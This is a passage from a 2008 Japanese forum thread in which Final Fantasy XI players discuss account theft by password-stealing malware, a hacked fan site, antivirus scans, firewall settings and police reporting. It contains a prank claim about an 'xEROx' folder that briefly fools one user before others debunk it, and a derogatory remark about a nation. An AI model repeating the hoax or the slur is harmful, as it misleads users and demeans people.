PostalCode: 90044
Country: US
RegDate: 2004-01-26
Updated: 2004-01-26

NetRange: 64.125.250.0 - 64.125.251.255
CIDR: 64.125.250.0/23
NetName: MFN-T349-64-125-250-0-23
NetHandle: NET-64-125-250-0-1
Parent: NET-64-124-0-0-1
NetType: Reassigned
Comment: abuse issues to abuse@FC2.com
RegDate: 2004-01-26
Updated: 2004-01-26
189 名前：既にその名前は使われています：2008/08/14(木) 21:10:27 ID:ghTLqZUH: 先月ハック被害に遭い
垢ハック後にクリーンインストールしてから
PG2/avast！/flashplayer最新/winアップデート最新まで持っていって
それでも心配になりカスペルスキーのオンラインスキャンをかけて見たのですが
重要なエリア/マイコンピュータ等をスキャンすると　ロックされてスキャン出来ないエリアが出るのですが
これってどうにかいい方法ありますでしょうか・・・？

飛ばしていてもいい領域ならばいいのですが、見れないと意味がないのであれば
オンラインスキャンの意味がないのかな～・・と思いまして。
何方かご教示いただけると助かります。

ちなみに現在はavast　カスペともに何も検出されておりません。
190 名前：既にその名前は使われています：2008/08/14(木) 21:15:51 ID:iIdWbJKU: >>189
そりゃ使用中のファイルだから仕方が無い
ロックが極力かかってない状態でスキャンしたいっていうなら、製品版か体験版で
常駐アプリも極力切った状態とかでスキャンするしかないよ。
191 名前：既にその名前は使われています：2008/08/14(木) 21:18:57 ID:jVM/XjPc: >>162
RMTやってた連中のまわりでも垢ハックではじめて常連が敬遠しはじめたんじゃねーか？
影響あるない関係なく危ないかもしれないとか考えるしな。

垢売りの市場もしぶってきてるみたいだし
192 名前：既にその名前は使われています：2008/08/14(木) 21:23:16 ID:ghTLqZUH: >>190さんありがとうございます。
ここの皆さんもカスペでスキャンした！っていうのは
ロック状態なのかな～と思って若干気になっていました。

体験版をDLしてavastをいっぺんアンインストールして見ます！
アドバイスどうもでした！
193 名前：既にその名前は使われています：2008/08/14(木) 21:43:22 ID:REdBSRMf: POLで突然マウスがきかなくなってキーボード操作しか受け付けなくなったんだけど
何なのこれ
194 名前：既にその名前は使われています：2008/08/14(木) 22:14:50 ID:BdHDMfA1: でっていう
195 名前：既にその名前は使われています：2008/08/14(木) 22:22:51 ID:meMultHp: >>193
たぶんマウスがこわれた。
196 名前：既にその名前は使われています：2008/08/14(木) 22:25:22 ID:/cBBvjv1: 実は右手が動いてないという落ちはないよなｗ
197 名前：既にその名前は使われています：2008/08/14(木) 22:27:09 ID:B86L0cAt: 動いているけど場所が違（以下自粛
198 名前：既にその名前は使われています：2008/08/14(木) 22:52:41 ID:9Ue13LDY: >>187
かんけーねー
馬鹿はパソコンしないそれだけ。
馬鹿は携帯いじくって遊んでるよ
199 名前：既にその名前は使われています：2008/08/14(木) 23:04:53 ID:zQGTa+ds: >>192 おいおい垢売りしぶってきてるってどこ見ていってんだよｗ
200 名前：既にその名前は使われています：2008/08/14(木) 23:13:01 ID:WWu0wgQd: >>198
おいばかやめろ。携帯厨＝スイーツで
スイーツのバックには鬼女板がいるんだから、争い事に持っていくな。
毎日みたいに消されたいか？
201 名前：既にその名前は使われています：2008/08/14(木) 23:14:26 ID:fvuyNtod: 業者サイト覗くのさえリスク伴うから渋りもするだろ
「RMT業者が垢ハックしてる」って認識だろうし
なんか、必死な業者混ざってる悪寒
202 名前：既にその名前は使われています：2008/08/14(木) 23:50:20 ID:EnO+gkIF: >>201
業者は何時だって必死さ。
なんたって人命より金の方が重い人種なんだからな。
必死になってようやく生活できるクズ国だからしょうがない。
(さらに>>>>>>越えられない万里の長城>>>>>>国の面子だからタチが悪い)
203 名前：既にその名前は使われています：2008/08/15(金) 00:08:35 ID:REdBSRMf: ＰＯＬ以外ではＰＣ操作もＦＦ上でも普通に動くのに
不自然にＰＯＬの画面でだけマウスが効かずにクリックできなくなる
新種のパス抜きウィルスかと思ったけどそれらしい報告も無いな・・・
204 名前：既にその名前は使われています：2008/08/15(金) 00:10:16 ID:INa/o3rB: オプションでハードウェアカーソルキーだかなんだかにチェックはずれてんじゃね
205 名前：既にその名前は使われています：2008/08/15(金) 00:16:29 ID:D2s4LUm3: >>204
それFFの設定だしPOLとは関係ないんじゃないかな？
206 名前：既にその名前は使われています：2008/08/15(金) 00:28:27 ID:tBGBx2Km: 俺が帰省してる間にまたヤバい事把握
207 名前：既にその名前は使われています：2008/08/15(金) 00:49:46 ID:DqKLF9ce: なんでもかんでもウイルスの仕業ですか？
そう思うならまずPC内スキャンしなよ
使ってる物以外のオンラインスキャンとかもつかってさ～
ただ動かん、何？ってこれじゃ答えようがないって思わない？
208 名前：既にその名前は使われています：2008/08/15(金) 01:47:44 ID:du3tdCCK: だって自動更新にしてるのにWindowsupdateが16個更新着てたウイルスですか？って人がいるくらいだしな

自分の個人情報や金がかかってるんだから少しは危機感もてといいたいがな・・・
209 名前：既にその名前は使われています：2008/08/15(金) 02:35:42 ID:F/4bMvln: >>207
んでお前は何しにこのスレ来てんの？？
POLだけおかしいなら報告としては十分だが？
スレ違いはお前なんだよ低脳ｗ
210 名前：既にその名前は使われています：2008/08/15(金) 03:15:18 ID:gF4fsDTE: ffxiweb■com見に行ったら1iveが居るんだけどさ…
211 名前：既にその名前は使われています：2008/08/15(金) 03:27:39 ID:NCkPyU0K: ■アカウントハックされた奴は最寄の警察に行って被害届けを出そう！
　不正アクセスに増加に伴い親身になって対応してくれるようになったぞ！

※最近業者が行っても無駄だの馬鹿にされるだの
　逮捕されないために必死になってるので注意！

警察の窓口に行き「不正アクセスの被害を受けました」と伝えれば話がスムーズに進みます。
212 名前：既にその名前は使われています：2008/08/15(金) 03:29:12 ID:SM0siTRs: >>211
>>13
電話くらい先にやってからいこうな
213 名前：既にその名前は使われています：2008/08/15(金) 03:30:44 ID:tWFH689M: >>210
>>107にあるのと同じものをフッタ部分に確認。
何でこのサイトはスクリプト書き込まれた事実を書いてないんだ・・・。
無責任じゃねえ？
214 名前：既にその名前は使われています：2008/08/15(金) 03:35:07 ID:gF4fsDTE: >>213
やっぱ酔って見間違えた訳じゃないのか
>>60で一度修復してるから再度やられたとしか思えん
215 名前：既にその名前は使われています：2008/08/15(金) 03:35:54 ID:yWaZRntF: >>212
業者お疲れさーん
216 名前：既にその名前は使われています：2008/08/15(金) 04:14:57 ID:XMD3NYkq: >>213
スクリプト削除して知らん振りしとけば問題ないと思ってるんだろう。
自分のサイトがウィルスまき散らしてた以上、利用者に告知をしておくのは最低限の義務だろうにね。

再度書き換えの原因はxreaのサポート板で書かれてたXOOPSスクリプトの脆弱性を突かれてる、ってとこ？
217 名前：既にその名前は使われています：2008/08/15(金) 04:29:07 ID:roCMppJx: 告知はしたほうがいいけど
別に義務でもなんでもないな
218 名前：既にその名前は使われています：2008/08/15(金) 04:58:13 ID:SwlXe5A8: 有料サービスでも何でもない一個人サイトに、自分のPCのセキュリティ欠陥を責任転嫁する。
一言目二言目には義務だの責任だの、そんな流れはいつものこと。

そういう他人任せな輩に限って、自分ではサイト管理者に連絡取って警告促す云々なんてまず
しない、責任も他人、注意喚起も他人、俺様はお客様で被害者だ、お前等が責任果たせ、
てないつもの流れ。
219 名前：既にその名前は使われています：2008/08/15(金) 05:02:04 ID:ZR3Xa3bl: 知り合いがvistaだから垢ハックされねーよｗｗｗとか抜かしてたんだが
んなことねーよな？
確かにVistaだと垢ハック報告見たことないよーな気がするが。
220 名前：既にその名前は使われています：2008/08/15(金) 05:10:15 ID:hobU79gM: ここの報告の真偽なんぞ書いた本人しかわからない
今の所VISTAで動く検体は一つも提出されてない
まぁVISTAの場合カーネルが保護されてるからシステムを利用したハッキングは容易には出来ないってだけ
221 名前：既にその名前は使われています：2008/08/15(金) 05:14:16 ID:NojJVEUZ: 適切に対策されたXP＝適切に対策されたVista＞＞越えられない壁＞＞素のVista≒素のXP SP2
222 名前：既にその名前は使われています：2008/08/15(金) 06:03:05 ID:6mxEVhb7: PC版の人は大変だな
223 名前：既にその名前は使われています：2008/08/15(金) 06:07:11 ID:Bz8ACj7P: すみません。
ＦF専用パソにするためのポートをもう一回教えていただいていいですか？；；
224 名前：既にその名前は使われています：2008/08/15(金) 07:09:20 ID:uXsg3hPD: pc版大変だけどいろんあ得点あるんだよぉぉ
画面が広くなるしぃ明るくなるしぃ綺麗なるでしょｗ
そして色んなツール群ｗｗｗｗ
225 名前：既にその名前は使われています：2008/08/15(金) 07:36:50 ID:e8Qomc+f: >>223
テンプレ>>14
■POL用ファイアーウォールの設定(アプリケーションルールでpol.exeの設定)
※これはpol.exeのプロセスの一部に同化してアカウント情報を送信するマルウェアにしか効果がありません。
　現在、上記に該当する既知のものはwzcsvbxm.dllを使う3種のみです。
※下記設定(記述の仕方)はお使いのソフトによって異なりますので、それぞれのソフトのFQAをご自身でご確認ください。
許可しているリモートIPの範囲
61.195.48.0-61.195.55.255 (61.195.48.0/21)
61.195.56.0-61.195.59.255 (61.195.56.0/22)
61.195.60.0-61.195.63.255 (61.195.60.0/22)
202.67.48.0-202.67.63.255 (202.67.48.0/20)
219.117.144.0-219.117.159.255 (219.117.144.0/20)
※「61」で始まるIPは「61.195.48.0-61.195.63.255(61.195.48.0/20)」でくくってしまっても○
※FWによっては（）内のIPアドレス範囲の設定の仕方を指定できるようなので、その場合（）内の数値を使用すると
　設定が簡単になります。

空けているローカルポート TCP1024-65535　UDP50000-65535
空けているリモートポート TCP25,80,110,443 ,50000-65535　UDP50000-65535
※契約プロバイダによってはローカルポート UDP53番が必要になるようです(プロバイダに確認してください)
226 名前：既にその名前は使われています：2008/08/15(金) 08:17:34 ID:DqKLF9ce: >>193
ツールを使ってるから
227 名前：既にその名前は使われています：2008/08/15(金) 08:45:02 ID:g8/Iv4y7: インターフェースが見つかりませんエラー
↓
怪しいのでウイルスバスター消して火スペインスコ
↓
Trojan-GameThief.Win32.WOW.bht 駆除
↓
POLのPW変更
↓
何故かフルスキャンで再度見つかる
↓
今度は駆除とちゃんと出ない
↓
大丈夫なのかなと思いログインしてみる
↓
その１時間後に垢ハック
↓
きれいに現金だけ抜かれる
228 名前：既にその名前は使われています：2008/08/15(金) 09:11:01 ID:4F8Xum77: >>227
イランつっこみかもだが
＞きれいに現金だけ抜かれる
仮想通貨ではなく、現金ですか？

その前の
＞その１時間後に垢ハック
からするとクレカの番号盗まれたって事？
229 名前：既にその名前は使われています：2008/08/15(金) 09:11:24 ID:KAo8R96r: >>216
コード確認　ソースも見てみました。
検索で　GETメソッド＋hiddenフィールドつかってるから
セッションの盗聴のできるつくりになってる気がする。
＋XOOPSのバージョンとサーバのphpの設定だろうねぇ・・・
警告出さないと　感染したの気づかない人大量に出そう。
230 名前：既にその名前は使われています：2008/08/15(金) 10:31:36 ID:J+D9gqgK: >>229
ググルと
「ＦＦＸｉリンク」で１位
「ＦＦ11 リンク」で３位

やはり、検索上位サイトをダイレクトに狙ってるんかな・・
231 名前：既にその名前は使われています：2008/08/15(金) 10:37:41 ID:9ADfwdZL: >>227
駆除できてなかったor復元されただけでしょ？
んで業者はパス変更を見てウィルス気がつかれたかと思い、処理順番を上げてうまーできましたと

二回目は無いんだしテンプレでも埋めて報告してきっちり対策しようぜ
232 名前：既にその名前は使われています：2008/08/15(金) 10:54:23 ID:vVtYKeeO: 保守
Flashplayer　　　 Ver9.0.124.0にしよう！
Realplayer　　　　使わないなら削除しよう！
WindowsUpdate　　常に最新にしよう！
233 名前：既にその名前は使われています：2008/08/15(金) 10:58:39 ID:j4/bqDK2: >>224
アカ盗まれたらパァじゃん。
234 名前：既にその名前は使われています：2008/08/15(金) 11:13:38 ID:9ADfwdZL: >>233
PSとかのグラでやるなら引退でもいいって思うやつ多いと思うぞ？ｗ
PCからはじめて友人宅ではじめてPSの画面見て別のゲームだとわかったし
235 名前：既にその名前は使われています：2008/08/15(金) 11:15:28 ID:lWgVh6ev: >>234
そうか？おれはWin>PS2に移ったがS端子で使えば特に不満はないが
PC空いて他の作業できることのほうが大きかった。
236 名前：既にその名前は使われています：2008/08/15(金) 11:28:57 ID:9ADfwdZL: まあそこらはフロントとバックのバッファ次第か
主観になるが自分は耐えられる範囲超えてたよｗ
237 名前：既にその名前は使われています：2008/08/15(金) 11:32:43 ID:JDKwDrbx: >>236
>まあそこらはフロントとバックのバッファ次第か
言いたいことは解るがなんか気持ち悪い言い回しだなｗ
238 名前：既にその名前は使われています：2008/08/15(金) 11:39:02 ID:JdDgXbsj: つまり、PS2しか知らずPS2でしかやってない私はある意味幸せ？
239 名前：既にその名前は使われています：2008/08/15(金) 12:10:07 ID:KAo8R96r: FFXI Web Potal のトップ　
＞FFXI Web Potal 管理人じゅんたるです。

＞リニューアルに伴い、ホームページをいったん閉鎖させていただきます。
＞ご迷惑をおかけいたしますが、よろしくお願いいたします。

＞２００８年８月１５日（金曜日）

踏んだ人に警告なしですか・
240 名前：既にその名前は使われています：2008/08/15(金) 12:14:16 ID:tZEoseJE: >>238 うむ　自分もＰＳからＰＣに換えて暫くは
ＰＳもなかなかいいじゃないか？って思ってた
ＰＣに慣れるともう戻れなくなる
ＰＳも使う気ならＰＣには手を出さないのが吉だと思う
241 名前：既にその名前は使われています：2008/08/15(金) 12:26:50 ID:SM0siTRs: >>215
昔警察に行った被害者ですがな。
いきなり凸したら逆に嫌な思いをすることになりかねんよ。
242 名前：既にその名前は使われています：2008/08/15(金) 12:33:55 ID:QOdL4Shn: 先にハイテク犯罪？に電話してから、最寄りの署がいいってテンプレにあったな
243 名前：既にその名前は使われています：2008/08/15(金) 12:34:53 ID:roCMppJx: >>239
自分がハッカーに攻撃されてるっぽいからとりあえず閉鎖しとくかって感じですかね。

> 危険なドメインに誘導すると思われるスクリプトが埋め込まれています。
と言われても知識の無い人には何がなんだかわからないのでは。
まず誰がどんな危険に晒されているのかを彼に理解させるとこから始めるべきかも。
244 名前：既にその名前は使われています：2008/08/15(金) 12:39:36 ID:3aShYCr2: wuが失敗する。。。
245 名前：既にその名前は使われています：2008/08/15(金) 12:42:21 ID:ITkts8qi: >>244
アップデートの後はしばらく混雑するけど、2～3回やり直してもダメっぽい？
246 名前：既にその名前は使われています：2008/08/15(金) 12:44:40 ID:JdDgXbsj: >>244
自動更新が有効になっているのなら
>121みたいなことかもしれないけど、まあがんばれ？
247 名前：既にその名前は使われています：2008/08/15(金) 13:07:42 ID:7I7hZCtW: やべぇ　何かログイン出来ない・・・　orz
248 名前：既にその名前は使われています：2008/08/15(金) 13:12:23 ID:yWaZRntF: 不正アクセスは警視庁まで

http://www.npa.go.jp/cyber/
249 名前：既にその名前は使われています：2008/08/15(金) 13:14:49 ID:7I7hZCtW: 課金してない別垢でサーチしても存在確認出来ない・・・　これは垢ハック確定？
250 名前：既にその名前は使われています：2008/08/15(金) 13:15:13 ID:8cPRIcLI: 県警では既に不正アクセスに関する専門の対策室ができております
泣き寝入りは絶対ダメ！お気軽にご相談を。

http://www.npa.go.jp/cyber/localpolice/index.html
251 名前：既にその名前は使われています：2008/08/15(金) 13:16:32 ID:0vU9mZoZ: >>248
細かい突っ込みだけど警察庁ねｗ
警視庁と警察庁は全く別物だからね。
252 名前：既にその名前は使われています：2008/08/15(金) 13:20:33 ID:iI+fP0WI: 業者に利用されまくってるんだから、ハック祭が収まるまでサーバー移動サービス中止すれば良いのに　＞＜；
253 名前：既にその名前は使われています：2008/08/15(金) 13:22:45 ID:k6XG7TrH: ■e＜業者もお客さまです^^
254 名前：既にその名前は使われています：2008/08/15(金) 13:28:42 ID:3aShYCr2: アカハックを受けて、一昨日クリーンインストールしたばっかりなのに・・・
マルウエアが見つかったぜ。。。
255 名前：既にその名前は使われています：2008/08/15(金) 13:29:51 ID:roCMppJx: 警視庁って他県でいうところの県警みたいなもんだよな
256 名前：既にその名前は使われています：2008/08/15(金) 13:36:31 ID:zn1zHexQ: 被害届けとして受理してくれない場合でも、
安全相談として受け付けてくれるし、捜査もしてくれる。
届けが多ければ多いほど被害対策等々しやすくなると思われるので、
警察には積極的に連絡したほうがいい。

警察庁インターネット安全・安心相談
http://www.cybersafety.go.jp/nwqa/TopPageServlet
257 名前：既にその名前は使われています：2008/08/15(金) 13:57:50 ID:J+D9gqgK: >>239
いったん閉鎖では、ハッキングの仕方の詳細がわかってない以上
放置中にのっとられる可能性もあるよね。
データをおいてあるサーバとドメインをいったん分離するなりしないと、
しばらくの間はググッて来くる人に感染させる可能性もありうる。
やっぱ、一度でもハックされたらデータをおいてあるサーバだけでも変えるべきかな？
258 名前：既にその名前は使われています：2008/08/15(金) 14:01:10 ID:ahkCpDkM: クリーンインストールする前に↓のSP3のCD作っておいてネットワークケーブル外して
クリーンインストール、即SP3適用、ネットに繋いでパッチ適用、セキュルティソフトインスコ更新
とかにしたほうがいいんじゃないかすら？
http://www.microsoft.com/downloads/details.aspx?FamilyID=2fcde6ce-b5fb-4488-8c50-fe22559d164e&DisplayLang=ja
259 名前：既にその名前は使われています：2008/08/15(金) 14:04:17 ID:7I7hZCtW: ぬぉ　KarnaeghDrv.dll　ってのが入ってた・・・　orz
260 名前：既にその名前は使われています：2008/08/15(金) 14:09:34 ID:3aShYCr2: >>258
THX、さっそくやってみる
誰かが言っていたが、クリーンインストール繰り返すと快感なるらしいね
やだよ、そんな境地ｗ
261 名前：既にその名前は使われています：2008/08/15(金) 14:27:08 ID:SM0siTRs: >>259
アウアウです
金曜だから急いで手続き始めたほうがいいよ
262 名前：既にその名前は使われています：2008/08/15(金) 14:36:13 ID:9ADfwdZL: まずpsとかboxあるならそっちでパス変えたほうがいいぞ
リアル知り合いいるならそっちからでもいいし
263 名前：既にその名前は使われています：2008/08/15(金) 14:52:46 ID:JsQBhKoN: >>259
俺も先週踏んだからそのファイル探してるんだけど、system32フォルダ中に
隠しファイルとかじゃなくて普通に入ってたのかね？
264 名前：既にその名前は使われています：2008/08/15(金) 14:53:19 ID:YZS8ymwK: >>225
ありがとう；；；
265 名前：既にその名前は使われています：2008/08/15(金) 14:57:22 ID:4Btey1VW: xreaってsakuraと関係あったような気がしたのか
↓の範囲もブロックしてるのですが、必要ありませんか？

SAKURA Internet Inc.:59.106.0.0-59.106.0.255
SRS SAKURA Internet Inc.:202.181.96.0-202.181.107.255
SRS SAKURA Internet Inc.:202.222.31.0-202.222.31.255
SAKURA Internet Inc.:210.188.219.0-210.188.219.255
266 名前：既にその名前は使われています：2008/08/15(金) 14:58:56 ID:k6XG7TrH: >>263
隠しだと見つけられないとかのが問題じゃね?
267 名前：既にその名前は使われています：2008/08/15(金) 15:21:30 ID:JsQBhKoN: >>266
まぁそうなんですがね。。いちよー最初のテンプレにある.dllとKarnaeghDrv.dllを探した
んだけど全然見つからない、、がFF11マップサイトを踏んだ事には踏んでるので
どっちにしてもｸﾘｰﾝｲﾝｽﾄｰﾙするまで安心できないな。
268 名前：既にその名前は使われています：2008/08/15(金) 15:30:01 ID:TVPFM1z8: ノートンの隔離ファイル削除ってどーやるんだっけ？
ふと思い立ってカスペのオンラインスキャンしたら数件HITして
終わるまで気が気じゃなかったが結果的に隔離ファイルだったもんで
消しちまいたいがヘルプ軽く読んでもわからんかった

しっかり読めって？
269 名前：既にその名前は使われています：2008/08/15(金) 15:33:08 ID:UdtF/CMy: >>259
すぐに凍結手続きを。
270 名前：既にその名前は使われています：2008/08/15(金) 15:39:51 ID:HSYkMwSE: age
271 名前：既にその名前は使われています：2008/08/15(金) 15:44:27 ID:DLC2GCnG: スタート　→　マイコンピューター　→　ローカルディスク　→プログラムファイル　の一番下にxEROxというのがあったら既に手遅れです
272 名前：既にその名前は使われています：2008/08/15(金) 15:49:05 ID:2FOBiNy3: >>268
メインウィンドウの左側にある［履歴の表示］をクリック↓
［表示の選択］ドロップダウンリストで［検疫］を選択↓
セキュリティ履歴の検疫表示で処理を実行したい項目を選択↓
右ペインで［詳細］をクリック↓
[処理]で実行したい処理を選択(オプションは下のみっつ)↓

　 [リスクの復元］
　選択した項目を修復しないで元の場所に戻す
　［履歴から削除］
　選択した項目をセキュリティ履歴ログから削除
　［シマンテック社に提出］
　選択した項目をシマンテック社に送信

ついでに、履歴から削除した隔離ファイルはゴミ箱に移動しますから
ゴミ箱もカラにしておくのがいいです
273 名前：既にその名前は使われています：2008/08/15(金) 15:49:27 ID:BlcUSmo2: >>268
しっかり嫁
274 名前：既にその名前は使われています：2008/08/15(金) 15:55:45 ID:TVPFM1z8: >>272
さんきう、愛してるぜ

>>273
おまいも愛してやろうｗ
275 名前：既にその名前は使われています：2008/08/15(金) 15:56:37 ID:cBJvVe6y: プログラムファイルにｘEROｘあった場合は
OSからアンインストールしないと駄目そうかな？
276 名前：既にその名前は使われています：2008/08/15(金) 15:58:46 ID:/0/DtWc7: >>275
削除できない場合は深く潜りこんでるのでアンインスコが必要です
そして削除できない場合は既にパスは流失していると思われます
277 名前：既にその名前は使われています：2008/08/15(金) 15:58:46 ID:L5toPeDB: この流れはマジレス禁止なのか
278 名前：既にその名前は使われています：2008/08/15(金) 16:00:59 ID:cBJvVe6y: >>276
削除出来ない・・orz
アドバイスありがとう、アンインスコして
パス変えるわ・・・
279 名前：既にその名前は使われています：2008/08/15(金) 16:01:31 ID:k6XG7TrH: >>275
jdbgmgr.exeという熊がいたら感染
ttp://www.ipa.go.jp/security/topics/alert140515.html
みたいなデマだ、真に受けるなよ。
ttp://www.fujixerox.co.jp/release/2001/1228_nwwia.html
280 名前：既にその名前は使われています：2008/08/15(金) 16:02:03 ID:KbyvmRc3: >>278
おまえ・・だまされてるのに気づけよ・・ぐぐってみろ・・
281 名前：既にその名前は使われています：2008/08/15(金) 16:03:09 ID:PM2+BHj5: >>271
ttp://www.tef-room.net/trouble/xerox.html
これじゃなくて、マジでウィルスいるうんか？
282 名前：既にその名前は使われています：2008/08/15(金) 16:03:18 ID:ttmdzMk1: >>275
嘘だからだまされるなよｗ
283 名前：既にその名前は使われています：2008/08/15(金) 16:03:55 ID:PM2+BHj5: 今リロードしたw
284 名前：既にその名前は使われています：2008/08/15(金) 16:04:09 ID:D2s4LUm3: 本当にｘEROｘフォルダなら怪しさ大爆発
xeroxフォルダならＸＰ標準
285 名前：既にその名前は使われています：2008/08/15(金) 16:04:17 ID:roCMppJx: こんなネタ真に受けてるならセキュリティも笊だろうから
やっぱりクリーンインストールしたほうがいいんじゃないかな
286 名前：既にその名前は使われています：2008/08/15(金) 16:07:45 ID:cBJvVe6y: >>284
xeroxだった、すまない知識乏しくてorz
>>285
セキュリティソフトはカスペ友達に勧められて使ってて
今の所検知なしかなー
287 名前：既にその名前は使われています：2008/08/15(金) 16:11:24 ID:7I7hZCtW: >>263
ごめんなさい。ベランダで日焼けしてた。
全部表示にして検索かけたから不明。

ウィルスバスターではひっかからないんだなぁ。
気が付く直前にウィルスチェックしたばっかなのに・・・

ちくしょ～　１１系のサイトは一切見てなかったんだけどなぁ・・
ネットこえぇよ～　(;´д⊂)
288 名前：既にその名前は使われています：2008/08/15(金) 16:36:33 ID:ttmdzMk1: > ベランダで日焼けしてた。
なんだこれはｗ
289 名前：既にその名前は使われています：2008/08/15(金) 16:42:11 ID:k6XG7TrH: >>287 は布団
290 名前：既にその名前は使われています：2008/08/15(金) 16:50:34 ID:JsQBhKoN: 俺もＰＣが家に来たばっかの頃エロサイトとか見たりした事あったし
xeroxにはびびらされたもんだｗ
291 名前：既にその名前は使われています：2008/08/15(金) 17:00:02 ID:4F8Xum77: 「Windows Update」のエラー報告が急増中、原因はウイルス
ttp://itpro.nikkeibp.co.jp/article/NEWS/20080814/312758/
「Windows UpdateやMicrosoft Updateのサイトにアクセスして
更新プログラムを適用しようとすると、『0x8DDD0018』あるいは
『1058』といったエラー番号ともに、
『必要なサービスアプリケーションが
無効になっているため、Windows Update を続行できません』
といったエラーメッセージが表示される」
292 名前：既にその名前は使われています：2008/08/15(金) 17:03:50 ID:k6XG7TrH: XREAトロイ、深夜に更新されていたみたい。
ttp://www.virustotal.com/analisis/9eaa00549133a784be795e360dd56c9e
今回はNortonとBitDefenderががんばりました。
293 名前：既にその名前は使われています：2008/08/15(金) 17:06:13 ID:8oSnsHDf: 先日アカウントハックされたんだが
カスペルのオンラインスキャンとかＡＶＧでのスキャン
spybotでのスキャンでもそれらしいものがひっかからなかった、、、
痕跡ものこらないものもあるん？こういうの疎くて；；
294 名前：既にその名前は使われています：2008/08/15(金) 17:06:44 ID:JsQBhKoN: >>287
日焼けｗ
俺もウィルスバスターだけどカスペルスキーかけたら何かしらウィルスあったりする事あったしなぁ、、、
ＦＦ系みてなくてそれは怖いな
295 名前：既にその名前は使われています：2008/08/15(金) 17:08:13 ID:k6XG7TrH: オンラインスキャンはあくまでブラウザから動かす物なので
変なの(rootkit等)がシステムに食い込んだまま
起動したWindowsからではまず検知できないっすよ。
296 名前：既にその名前は使われています：2008/08/15(金) 17:14:11 ID:7I7hZCtW: 今チャットサポートにアクセス中・・・
297 名前：既にその名前は使われています：2008/08/15(金) 17:16:38 ID:7I7hZCtW: あれ・・　反応しなくなった
Connection closed due to network problems.
で止まったけど切れたのかな？ｗ
298 名前：既にその名前は使われています：2008/08/15(金) 17:17:24 ID:k6XG7TrH: >>297
うん。
299 名前：既にその名前は使われています：2008/08/15(金) 17:17:52 ID:HX8S1gEr: >>296
どんな環境で食らったのか教えてくれまいか
できれば>>6のテンプレに沿って
300 名前：既にその名前は使われています：2008/08/15(金) 17:18:26 ID:7I7hZCtW: ちくそ～　(;´д⊂)
>>298
さんくす～
301 名前：既にその名前は使われています：2008/08/15(金) 17:19:15 ID:7I7hZCtW: >>299
ちと待ってて
先に垢をどうにかしてくる
302 名前：既にその名前は使われています：2008/08/15(金) 17:19:53 ID:HX8S1gEr: >>301
ありがとう
余裕出来てからでいいお　
303 名前：既にその名前は使われています：2008/08/15(金) 17:35:56 ID:jmS0ivW/: 今まで何人がハックされたんだろうな
住所や名前がムーミンパパで何も手出しできなくてそのまま業者キャラとして
使われてる場合や、モチベ消えて引退も考えると
トータルで何人がヴァナを去っていったんだろう
リアルに■eの被害総額結構いってそうだが。ユーザー喪失と言う意味で
表面上の被害者人数だけでも公開は・・・まあスクエニはしねえだろうけどもｗ
すれば多少は注意喚起になると思うけどな
304 名前：既にその名前は使われています：2008/08/15(金) 17:36:28 ID:7I7hZCtW: とりあえずキャラ確認してきた

きっちしエクレア以外なくなってる　orz
305 名前：既にその名前は使われています：2008/08/15(金) 17:37:19 ID:8oSnsHDf: もしかしてテンプレのまとめサイトのxreaがアドレスにはいってるほうって
今でも踏むと危険？
306 名前：既にその名前は使われています：2008/08/15(金) 17:40:02 ID:/B3Ri8bQ: >>304
ん？新しいパスワードは発行してもらえたの？もうGMに繋がったの？
307 名前：既にその名前は使われています：2008/08/15(金) 17:42:16 ID:jmS0ivW/: LSコミュ？
308 名前：既にその名前は使われています：2008/08/15(金) 17:50:28 ID:HX8S1gEr: >>304
(´；ω；`)
309 名前：既にその名前は使われています：2008/08/15(金) 17:55:37 ID:7I7hZCtW: 不正アクセス専用チャットサポートで本人確認後、即発行してくれた。
310 名前：既にその名前は使われています：2008/08/15(金) 17:57:00 ID:8oSnsHDf: う、、、今カスペルのオンラインスキャンでメモリスキャンしたら
KarnaeghDrv.dllに感染してるものが７つでてきたorz
さっきttp://miku.xrea.jp/を開こうとしたからなのか、それとも前に感染してたのか、、
こいつのせいなのかなぁ　
311 名前：既にその名前は使われています：2008/08/15(金) 17:57:06 ID:/B3Ri8bQ: そか、対応速くてよかったねー。
312 名前：既にその名前は使われています：2008/08/15(金) 17:57:51 ID:k6XG7TrH: >>310
そこはやられてないよ。前に別なとこで踏んだんでしょ。
313 名前：既にその名前は使われています：2008/08/15(金) 18:00:20 ID:oas3FWe4: >>303
■にはたいした被害はないんじゃない
ユーザーなんて腐るほどいるし深刻になるほど減ってはいないと見た
しいて言えばパス抜かれたバカどもの尻拭いくらいじゃないか
314 名前：既にその名前は使われています：2008/08/15(金) 18:03:13 ID:8oSnsHDf: >>312
やはりそうか、KarnaeghDrv.dllってＡＶＧじゃひっかからないか、、
カスペルのトライアルいれてけしてみます
315 名前：既にその名前は使われています：2008/08/15(金) 18:10:48 ID:7I7hZCtW: >>6のテンプレの回答
●今日昼
●ＦＦ系は無し
●No
●半年くらい前から手打ち
●半年くらい前に変更
●No
●No
●No
●XP pro SP2
●IE 7.0.5730.13
●8月12日
●Flash 9.0.124.0 　　Realは無し
●ウイルスバスター2007 プログラム 15.30.1128 　検索エンジン　8.710.1002　　　パターンファイル 5.479.00
●なし
●手動でKarnaeghDrv.dllを発見しただけでカスペルはまだ　　ウイルスバスターは何もひっかからない
●半年くらい前に読んだっきり
●よくわからない　(;´д⊂)
●同上
●特に変な症状はないかなぁ・・？
316 名前：既にその名前は使われています：2008/08/15(金) 18:16:41 ID:7I7hZCtW: 引越し直後だったから、とりあえず繋げたって状態で
ルータ外してたのがまずかったかなぁ・・

とりあえずカスペルで検索してみます
317 名前：既にその名前は使われています：2008/08/15(金) 18:16:57 ID:du3tdCCK: ハックされてるのにクリーンインスコしないなんてつわものだな
318 名前：既にその名前は使われています：2008/08/15(金) 18:17:01 ID:mASo62A9: わかりにくいわｗ
319 名前：既にその名前は使われています：2008/08/15(金) 19:01:31 ID:skCOKTze: 先日垢ハックされて現在凍結中です。

カスペルスキーでスキャンしたところ
Trojan-GameThief.Win32.WOW.bht
が見つかったんですが、どうやって駆除したらよいのでしょうか？

こういうの苦手でどうやっていいかわからないっす・・・
320 名前：既にその名前は使われています：2008/08/15(金) 19:03:18 ID:ITkts8qi: わからないならクリーンインストール
パッチ当たるまで他サイトを見に行かないように。

というかクリーンインストールしないと安心できないだろうしね。
321 名前：既にその名前は使われています：2008/08/15(金) 19:06:30 ID:skCOKTze: >>320
ありがとうございます。
やってみます。
322 名前：既にその名前は使われています：2008/08/15(金) 19:20:49 ID:jmS0ivW/: >315
flash最新でハックされたの？
